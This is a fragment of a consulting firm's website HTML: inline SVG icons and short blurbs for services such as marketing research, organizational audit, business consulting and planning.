		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M505.709,159.575L336.462,50.682c-3.379-2.174-7.879-1.196-10.052,2.181c-2.173,3.378-1.197,7.878,2.181,10.052    l166.773,107.301h-38.878L266.64,48.07c-6.463-4.158-14.816-4.157-21.28,0L55.514,170.216H16.636L255.991,16.204l33.899,21.81    c3.379,2.173,7.878,1.197,10.052-2.181c2.173-3.378,1.197-7.878-2.181-10.052l-33.899-21.81c-4.776-3.073-10.947-3.073-15.723,0    L6.291,159.575c-5.15,3.314-7.45,9.488-5.723,15.364c1.727,5.876,7.002,9.824,13.126,9.824h36.684v25.07v21.956    c0,5.789,4.106,10.637,9.558,11.784v12.801c0,6.64,5.402,12.042,12.042,12.042h1v89.112c0,4.017,3.256,7.273,7.273,7.273    c4.017,0,7.273-3.256,7.273-7.273v-96.385c0-4.017-3.256-7.273-7.273-7.273h-5.768v-10.04h51.513v10.038h-5.768    c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.273,7.273,7.273h5.768v10.915H74.483V429.11h5.768    c4.017,0,7.273-3.256,7.273-7.273v-18.59c0-4.017-3.256-7.273-7.273-7.273c-4.017,0-7.273,3.256-7.273,7.273v11.317h-1    c-6.64,0-12.042,5.401-12.042,12.041v12.801c-5.453,1.147-9.558,5.995-9.558,11.784v14.682H24.614    c-8.04,0-14.581,6.541-14.581,14.581v15.299c0,8.04,6.541,14.581,14.581,14.581h462.772c8.04,0,14.581-6.541,14.581-14.581    v-15.299c0-8.04-6.541-14.581-14.581-14.581h-25.764V451.19c0-5.789-4.106-10.637-9.558-11.784v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-21.956v-25.07h36.684c6.124,0,11.399-3.948,13.126-9.824    C513.159,169.063,510.859,162.888,505.709,159.575z M253.23,60.303c1.683-1.083,3.857-1.082,5.54,0l170.833,109.914H82.398    L253.23,60.303z M64.924,184.762h382.151v17.797h-77.902h-70.585h-85.176h-70.585H64.924V184.762z M296.304,439.408v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-14.683H361.9v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682h-56.038v-14.682C305.862,445.403,301.756,440.555,296.304,439.408z     M140.542,439.408v-12.801c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.452-1.147,9.558-5.995,9.558-11.784v-14.683h56.039v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682H150.1v-14.682C150.1,445.403,145.994,440.555,140.542,439.408z M275.989,429.11    h5.768v10.915h-51.513V429.11h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142c0-4.017-3.256-7.274-7.273-7.274h-5.768V243.83    h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696C268.716,425.854,271.972,429.11,275.989,429.11z M222.97,229.284    h-0.032h-2.253v-12.178h70.63v12.178h-2.285c-0.005,0-0.011,0.001-0.016,0.001s-0.011-0.001-0.016-0.001H222.97z M220.685,454.213    c0.71,0.231,1.466,0.36,2.253,0.36h66.059c0.811,0,1.589-0.139,2.318-0.384v11.684h-70.63V454.213z M67.21,229.284h-2.285v-12.178    h70.63v12.178h-0.001h-2.285H67.21z M64.924,454.201c0.719,0.238,1.486,0.372,2.285,0.372h66.06c0.799,0,1.566-0.134,2.285-0.372    v11.672h-70.63V454.201z M487.421,480.454l-0.02,15.333c0,0-0.004,0.001-0.015,0.001l-462.807-0.034l0.035-15.334L487.421,480.454    z M444.77,454.572c0.807,0,1.58-0.137,2.306-0.379v11.68h-70.63v-11.665c0.713,0.234,1.473,0.364,2.265,0.364H444.77z     M391.772,253.869h-5.768V243.83h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.274,7.273,7.274    h5.768v10.915h-51.513v-10.915h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142C399.045,257.125,395.789,253.869,391.772,253.869z     M447.077,229.284L447.077,229.284h-2.286c-0.003,0-0.007,0.001-0.01,0.001s-0.007-0.001-0.01-0.001h-66.039h-0.02h-2.265v-12.178    h70.63V229.284z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M259.076,113.165V90.459c7.83,0.559,10.738,4.138,13.422,4.138c3.356,0,4.922-4.25,4.922-6.375    c0-5.48-10.738-7.829-18.344-8.053v-3.02c0-1.343-1.677-2.573-3.355-2.573c-1.902,0-3.244,1.231-3.244,2.573v3.244    c-10.626,1.118-21.252,6.711-21.252,20.804c0,14.317,11.186,18.344,21.252,21.923v26.283c-11.409-0.894-14.429-8.724-18.12-8.724    c-2.796,0-5.145,3.691-5.145,6.376c0,5.481,9.395,12.975,23.265,13.199h0v3.468c0,1.343,1.342,2.573,3.244,2.573    c1.677,0,3.355-1.231,3.355-2.573v-3.803c12.08-1.677,20.357-9.283,20.357-23.041    C279.433,121.666,268.807,116.744,259.076,113.165z M253.149,111.04c-5.929-2.237-10.738-4.586-10.738-10.962    c0-5.816,4.474-8.612,10.738-9.395V111.04z M258.406,149.181V125.58c5.48,2.349,9.842,5.481,9.843,12.528    C268.249,144.483,264.446,148.063,258.406,149.181z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Government Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Marketing Research</a></h5>				<p>Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)</p>			
        			<a href="#"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<circle cx="10.06" cy="500.446" r="10.06"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="267.005" cy="245.308" r="10.04"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M398.479,118.032c-8.071-8.072-18.802-12.516-30.216-12.516c-11.414,0-22.146,4.446-30.216,12.516    c-16.661,16.662-16.661,43.772,0,60.433c8.332,8.331,19.272,12.495,30.216,12.495c10.941,0,21.886-4.166,30.216-12.495    C415.14,161.803,415.14,134.693,398.479,118.032z M384.282,164.266c-8.833,8.832-23.206,8.832-32.037,0    c-8.833-8.832-8.833-23.204,0-32.037c4.279-4.279,9.967-6.635,16.018-6.635c6.051,0,11.739,2.356,16.018,6.635    C393.114,141.062,393.114,155.434,384.282,164.266z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M125.409,411.45c-4.964-2.472-10.99-0.451-13.462,4.512l-11.958,24.015c-5.2,10.441-15.658,17.423-27.296,18.219    l-13.908,0.952c-2.351,0.157-3.897-1.014-4.612-1.729s-1.889-2.264-1.729-4.613l0.952-13.907    c0.797-11.637,7.779-22.096,18.219-27.296l24.014-11.958c4.964-2.472,6.984-8.499,4.512-13.462    c-2.471-4.963-8.498-6.984-13.462-4.512l-24.014,11.958c-16.792,8.362-28.02,25.182-29.302,43.898l-0.952,13.907    c-0.514,7.507,2.242,14.863,7.562,20.183c4.898,4.898,11.523,7.624,18.403,7.624c0.591,0,1.186-0.02,1.78-0.061l13.908-0.952    c18.716-1.281,35.536-12.508,43.898-29.302l11.958-24.014C132.392,419.948,130.372,413.922,125.409,411.45z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M505.07,8.18c-4.711-4.641-11.201-7.068-17.793-6.639l-9.348,0.596c-83.819,5.351-162.262,45.81-215.215,111.004    L240.71,140.23l-57.583-1.691c-0.098-0.003-0.197-0.004-0.294-0.004c-45.668,0-88.603,17.784-120.896,50.076L2.959,247.59    c-2.805,2.805-3.696,7-2.272,10.702c1.424,3.703,4.894,6.221,8.856,6.423l124.844,6.414l-5.09,6.267    c-2.565,3.159-2.971,7.553-1.026,11.127c1.956,3.596,4.006,7.135,6.144,10.617l-29.606,35.147    c-2.531,3.005-3.076,7.211-1.397,10.763c6.467,13.665,15.05,25.943,25.514,36.493c10.718,10.808,23.251,19.646,37.249,26.271    c1.368,0.648,2.835,0.965,4.293,0.965c2.261,0,4.503-0.764,6.327-2.243c6.378-5.174,13.731-11.311,20.843-17.245    c5.069-4.23,10.255-8.557,15.102-12.547c2.893,1.741,5.822,3.429,8.795,5.046c1.504,0.818,3.153,1.221,4.796,1.221    c2.186,0,4.358-0.712,6.156-2.108l6.843-5.31l6.442,125.37c0.204,3.962,2.721,7.432,6.423,8.856c1.172,0.45,2.39,0.67,3.6,0.67    c2.615,0,5.183-1.023,7.101-2.942l58.979-58.979c32.293-32.293,50.076-75.227,50.076-120.896v-54.995l23.267-18.055    c69.729-54.11,112.196-135.704,116.512-223.862l0.239-4.886C512.295,19.27,509.779,12.822,505.07,8.18z M33.123,245.822    l43.012-43.012c28.465-28.465,66.303-44.157,106.553-44.196l42.085,1.236l-74.71,91.98L33.123,245.822z M184.774,373.874    c-5.241,4.372-10.614,8.856-15.6,12.957c-9.644-5.223-18.368-11.74-25.992-19.428c-7.384-7.445-13.669-15.922-18.737-25.26    l21.676-25.733c6.554,8.793,13.728,17.122,21.478,24.925c0.006,0.006,0.012,0.011,0.018,0.017    c0.002,0.002,0.004,0.005,0.006,0.007c0.003,0.003,0.006,0.005,0.009,0.008c8.593,8.648,17.836,16.584,27.641,23.761    C191.811,368.002,188.264,370.962,184.774,373.874z M351.875,327.672c0,40.305-15.695,78.197-44.196,106.698l-43.012,43.012    l-6.002-116.792l93.209-72.33V327.672z M491.678,29.779c-4.029,82.297-43.673,158.467-108.767,208.98l-157.46,122.189    c-13.058-7.63-25.229-16.639-36.368-26.846l53.086-53.086c3.92-3.92,3.92-10.278,0-14.199c-3.921-3.921-10.278-3.921-14.199,0    l-53.036,53.036c-9.751-10.795-18.387-22.541-25.74-35.104L278.3,125.8C327.732,64.941,400.96,27.171,479.207,22.177l9.348-0.596    c1.225-0.076,2.045,0.532,2.423,0.904c0.377,0.371,1,1.178,0.94,2.409L491.678,29.779z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Organizational Audit</a></h5>				<p>Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.</p>			
        			<a href="#"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
        			<a href="#"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Consulting</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled </p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M473.492,189.736h-0.001l-22.417-2.651c-2.44-6.903-5.255-13.693-8.412-20.293l13.979-17.731    c13.686-17.358,13.649-40.806-0.084-54.541l-39.083-39.083c-13.734-13.734-37.182-13.771-54.543-0.083l-17.73,13.981    c-6.603-3.159-13.393-5.974-20.294-8.412l-2.651-22.417C319.659,16.554,303.054,0,283.63,0h-55.271    c-19.424,0-36.03,16.555-38.626,38.51l-2.65,22.417c-6.899,2.439-13.684,5.251-20.284,8.408l-17.73-13.981    c-17.359-13.687-40.807-13.653-54.543,0.083L55.444,94.519c-13.734,13.735-13.771,37.183-0.084,54.541l13.979,17.73    c-3.159,6.602-5.974,13.392-8.413,20.293l-22.418,2.651C16.555,192.33,0,208.935,0,228.359v55.271    c0,19.423,16.554,36.029,38.506,38.624l22.417,2.652c2.438,6.902,5.253,13.692,8.411,20.294l-13.981,17.731    c-13.688,17.359-13.652,40.807,0.083,54.542l39.082,39.083c13.733,13.733,37.182,13.771,54.541,0.084l17.73-13.979    c6.603,3.159,13.393,5.974,20.294,8.413l2.65,22.417C192.329,495.445,208.934,512,228.359,512h55.271    c19.424,0,36.029-16.554,38.626-38.507l2.651-22.416c6.906-2.44,13.698-5.255,20.304-8.416l17.73,13.98    c17.359,13.684,40.807,13.65,54.541-0.085l39.082-39.082c13.734-13.734,13.771-37.182,0.083-54.542l-13.981-17.731    c3.158-6.602,5.973-13.392,8.411-20.294l22.416-2.652C495.445,319.658,512,303.053,512,283.63v-55.271    C512,208.935,495.445,192.33,473.492,189.736z M492,283.63c0,9.291-8.966,17.357-20.854,18.763l-28.704,3.396    c-3.897,0.461-7.165,3.16-8.354,6.9c-3.183,10.008-7.246,19.808-12.073,29.128c-1.807,3.487-1.406,7.709,1.026,10.792    l17.904,22.706c7.413,9.403,8.049,21.448,1.479,28.017l-39.082,39.083c-6.57,6.569-18.614,5.934-28.016-1.479l-22.706-17.903    c-3.083-2.431-7.303-2.833-10.792-1.026c-9.325,4.831-19.128,8.895-29.136,12.078c-3.74,1.189-6.439,4.457-6.9,8.355    l-3.396,28.705c-1.407,11.89-9.474,20.856-18.765,20.856H228.36c-9.292,0-17.359-8.967-18.765-20.857l-3.394-28.706    c-0.461-3.897-3.159-7.166-6.899-8.355c-10.006-3.183-19.806-7.246-29.129-12.076c-1.451-0.752-3.029-1.121-4.598-1.121    c-2.204,0-4.392,0.727-6.193,2.149l-22.706,17.902c-9.403,7.414-21.448,8.047-28.016,1.479l-39.082-39.083    c-6.571-6.57-5.935-18.614,1.479-28.016l17.904-22.707c2.431-3.084,2.833-7.306,1.026-10.792    c-4.827-9.319-8.889-19.12-12.073-29.128c-1.189-3.74-4.457-6.439-8.354-6.9l-28.705-3.396C28.966,300.987,20,292.921,20,283.63    v-55.271c0-9.291,8.967-17.358,20.857-18.764l28.706-3.394c3.898-0.461,7.166-3.159,8.355-6.899    c3.183-10.006,7.246-19.807,12.075-29.129c1.807-3.486,1.406-7.708-1.026-10.791l-17.902-22.706    c-7.414-9.402-8.049-21.446-1.479-28.016l39.081-39.083c6.569-6.57,18.615-5.935,28.017,1.48l22.706,17.904    c3.083,2.431,7.304,2.834,10.791,1.027c9.318-4.827,19.115-8.888,29.12-12.071c3.74-1.189,6.438-4.457,6.899-8.355l3.394-28.705    C211.001,28.967,219.067,20,228.359,20h55.271c9.291,0,17.358,8.966,18.764,20.855l3.396,28.705c0.461,3.898,3.16,7.166,6.9,8.355    c10.005,3.181,19.806,7.244,29.128,12.073c3.484,1.807,7.708,1.406,10.792-1.026l22.706-17.904    c9.404-7.412,21.448-8.051,28.017-1.48l39.083,39.082c6.569,6.57,5.933,18.614-1.479,28.016l-17.903,22.707    c-2.431,3.084-2.833,7.305-1.026,10.792c4.827,9.315,8.889,19.115,12.075,29.127c1.189,3.74,4.457,6.439,8.355,6.899l28.706,3.394    h-0.001c11.89,1.406,20.857,9.473,20.857,18.764V283.63z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M255.999,94.28c-89.173,0-161.721,72.548-161.721,161.721c0,35.631,11.362,69.426,32.86,97.729    c20.797,27.382,50.325,47.78,83.142,57.435c5.301,1.56,10.856-1.473,12.416-6.771c1.559-5.298-1.472-10.857-6.771-12.416    C156.078,374.37,114.279,318.454,114.279,256c0-78.145,63.575-141.721,141.721-141.721S397.721,177.855,397.721,256    c0,64.606-43.619,121.026-106.076,137.203c-5.346,1.385-8.558,6.842-7.173,12.188c1.167,4.506,5.226,7.495,9.674,7.495    c0.831,0,1.674-0.104,2.515-0.322C367.94,394.102,417.721,329.72,417.721,256C417.721,166.827,345.172,94.28,255.999,94.28z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M334.324,302.94L266,251.038v-44.663c0-5.523-4.478-10-10-10c-5.522,0-10,4.477-10,10V256    c0,3.126,1.462,6.072,3.952,7.962l72.275,54.903c1.809,1.374,3.933,2.038,6.041,2.038c3.019,0,6.003-1.361,7.97-3.951    C339.579,312.554,338.722,306.281,334.324,302.94z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="256" cy="164.02" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="252.36" cy="407.72" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Planning</a></h5>				<p>We’ve beven a strategy thought leader for nearly five decades</p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M489.129,42.371h-32.011V10c0-5.523-4.477-10-10-10s-10,4.477-10,10v38.237l-41.806,41.92    c-42.173-38.385-96.385-59.418-153.76-59.418c-61.083,0-118.511,23.787-161.703,66.979C36.657,140.91,12.87,198.338,12.87,259.421    s23.787,118.511,66.979,161.703c6.719,6.719,13.783,12.967,21.151,18.73l-55.074,55.074c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929l57.452-57.453c36.629,23.742,79.348,36.485,124.031,36.485    c44.901,0,87.818-12.868,124.566-36.833l57.801,57.801c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929    c3.905-3.905,3.906-10.237,0-14.143l-55.467-55.467c7.19-5.656,14.092-11.769,20.661-18.337    c43.192-43.192,66.979-100.62,66.979-161.703c0-34.789-7.614-68.199-22.63-99.303c-2.401-4.974-8.381-7.06-13.353-4.658    c-4.974,2.401-7.059,8.379-4.658,13.353c13.696,28.37,20.641,58.855,20.641,90.608c0,115.068-93.615,208.683-208.683,208.683    S32.867,374.49,32.867,259.421c0-115.068,93.615-208.683,208.683-208.683c52.045,0,101.242,18.958,139.627,53.59l-35.099,35.195    c-28.976-25.325-65.717-39.171-104.527-39.171c-87.711,0-159.069,71.358-159.069,159.069s71.36,159.069,159.071,159.069    s159.069-71.358,159.069-159.069c0-14.146-1.859-28.178-5.527-41.708c-6.436-23.746-18.393-45.726-34.797-64.125l42.276-42.391    c0.013-0.013,0.028-0.024,0.041-0.037c0.012-0.012,0.021-0.025,0.033-0.036l48.621-48.753h37.861c5.523,0,10-4.477,10-10    S494.652,42.371,489.129,42.371z M375.792,222.945c3.206,11.825,4.831,24.097,4.831,36.476    c0,76.683-62.386,139.069-139.069,139.069s-139.069-62.387-139.069-139.069s62.386-139.069,139.069-139.069    c33.479,0,65.202,11.779,90.375,33.362l-41.285,41.397c-13.628-10.428-30.644-16.643-49.09-16.643    c-44.637,0-80.953,36.315-80.953,80.953s36.315,80.953,80.953,80.953s80.953-36.315,80.953-80.953    c0-18.997-6.594-36.473-17.592-50.297l41.232-41.344C360.089,183.686,370.271,202.573,375.792,222.945z M235.828,264.236    c1.952,1.946,4.507,2.919,7.062,2.919c2.563,0,5.127-0.979,7.081-2.938l40.71-40.821c7.426,10.1,11.825,22.556,11.825,36.025    c0,33.609-27.343,60.953-60.953,60.953c-33.61,0-60.953-27.344-60.953-60.953s27.343-60.953,60.953-60.953    c12.935,0,24.933,4.062,34.81,10.961l-40.554,40.664C231.909,254.004,231.917,260.335,235.828,264.236z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="419.22" cy="133.64" r="10"></circle>
	</g>
</g>
</svg>	        
